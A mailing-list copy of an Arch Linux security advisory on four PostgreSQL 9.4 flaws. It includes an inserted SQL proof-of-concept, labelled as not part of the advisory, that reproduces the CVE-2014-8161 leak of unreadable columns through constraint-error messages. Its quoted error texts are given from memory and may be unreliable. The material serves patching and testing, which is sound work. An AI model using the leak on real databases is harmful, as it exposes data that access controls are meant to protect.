[arch-security] [ASA-201502-4] postgresql: multiple issues

Remi Gacogne rgacogne at archlinux.org
Fri Feb 6 11:16:07 UTC 2015


Arch Linux Security Advisory ASA-201502-4
=========================================

Severity: High
Date    : 2015-02-06
CVE-ID  : CVE-2014-8161 CVE-2015-0241 CVE-2015-0243 CVE-2015-0244
Package : postgresql
Type    : multiple issues
Remote  : Yes
Link    : https://wiki.archlinux.org/index.php/CVE

Summary
=======

The package postgresql before version 9.4.1-1 is vulnerable to multiple
issues, including information leak, denial of service, privilege
escalation and command injection.

Resolution
==========

Upgrade to 9.4.1-1.

# pacman -Syu "postgresql>=9.4.1-1"

The problems have been fixed upstream in version 9.4.1.

Workaround
==========

None.

Description
===========

- CVE-2014-8161 (information leak)

Some server error messages include the values of the columns that violate
a constraint, such as a unique constraint. If the user does not have
SELECT privilege on all columns of the table, such a message can expose
values that the user should not be able to see. The fix displays values
only when they came from the SQL command itself or could be selected by
the user.
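The following SQL script is added here as an illustration; it is not part of the advisory or of PostgreSQL's own material. It reproduces the CVE-2014-8161 leak on a test database and also gives a quick patched-or-not check for a 9.4 server. The role, table and column names are made up. The CHECK-constraint case is used because its DETAIL line dumps the whole failing row, including columns the role cannot SELECT; the error texts in the comments describe the 9.4 behaviour from memory and exact wording may differ between minor versions.

```sql
-- Run as a superuser on a throwaway database. All names below are invented.

-- Quick exposure check. Only meaningful on the 9.4 branch: 9.4.1 reports
-- server_version_num = 90401, so anything lower on this branch is affected.
SELECT current_setting('server_version_num')::int >= 90401 AS fixed_on_94_branch;

CREATE ROLE app_user LOGIN;            -- hypothetical low-privilege role

CREATE TABLE accounts (
    id       integer PRIMARY KEY,
    email    text    NOT NULL,
    api_key  text    NOT NULL,         -- app_user must never read this column
    balance  integer NOT NULL CHECK (balance >= 0)
);
INSERT INTO accounts VALUES (1, 'alice@example.org', 'k-secret-001', 10);

-- Column-level privileges: app_user may read id/email/balance and change
-- balance, but has no SELECT privilege on api_key.
GRANT SELECT (id, email, balance), UPDATE (balance) ON accounts TO app_user;

SET ROLE app_user;

-- 1. Ordinary reads are correctly blocked:
SELECT api_key FROM accounts;
--   ERROR:  permission denied for relation accounts

-- 2. Violate the CHECK constraint with a legitimate UPDATE. The server builds
--    the error DETAIL from the failing tuple.
UPDATE accounts SET balance = balance - 50 WHERE id = 1;
--   Unpatched (before 9.4.1): every column is echoed, api_key included:
--     ERROR:  new row for relation "accounts" violates check constraint
--             "accounts_balance_check"
--     DETAIL:  Failing row contains (1, alice@example.org, k-secret-001, -40).
--   Patched: only columns app_user can SELECT are shown, named explicitly:
--     DETAIL:  Failing row contains (id, email, balance) = (1, alice@example.org, -40).

RESET ROLE;

-- Cleanup
DROP TABLE accounts;
DROP ROLE app_user;
```

If the DETAIL line of step 2 shows the api_key value, the server is affected regardless of what the version check said; that is the observable behaviour the advisory describes, and it holds for any role that has write access to a table without full SELECT access to it.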

- CVE-2015-0241 (denial of service, privilege escalation)

When to_char() processes a numeric formatting template calling for a
large number of digits, PostgreSQL reads past the end of a buffer. When
processing a crafted timestamp formatting template, it writes past the
end of a buffer. Either case can crash the server. Attacks that lead to
privilege escalation have not been ruled out, though they seem unlikely.

- CVE-2015-0243 (denial of service, privilege escalation)

Errors in memory size tracking within the pgcrypto module permitted
stack buffer overruns and improper dependence on the contents of
uninitialized memory. The buffer overrun cases can crash the server, and
attacks that lead to privilege escalation have not been ruled out.

- CVE-2015-0244 (command injection)

If an error occurs while the server is in the middle of reading a
protocol message from the client, it can lose synchronization and
incorrectly interpret part of the message's data as a new protocol
message. An attacker able to submit crafted binary data within a command
parameter might succeed in injecting their own SQL commands this way.
Statement timeout and query cancellation are the most likely sources of
errors triggering this scenario. Particularly vulnerable are applications
that use a timeout and also submit arbitrary user-supplied data as binary
query parameters. Disabling statement timeout reduces, but does not
eliminate, the risk of exploitation. Thanks to Emil Lenngren for
reporting this issue.


Impact
======

A remote, authenticated attacker might be able to access sensitive
information, escalate privileges or cause a denial of service by crashing
the server. A remote attacker who can get crafted binary data submitted
as a command parameter (for example through an application that passes
user input as binary query parameters) might be able to inject arbitrary
SQL commands.

References
==========

https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8161
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0241
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0243
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0244
http://www.postgresql.org/docs/9.4/static/release-9-4-1.html
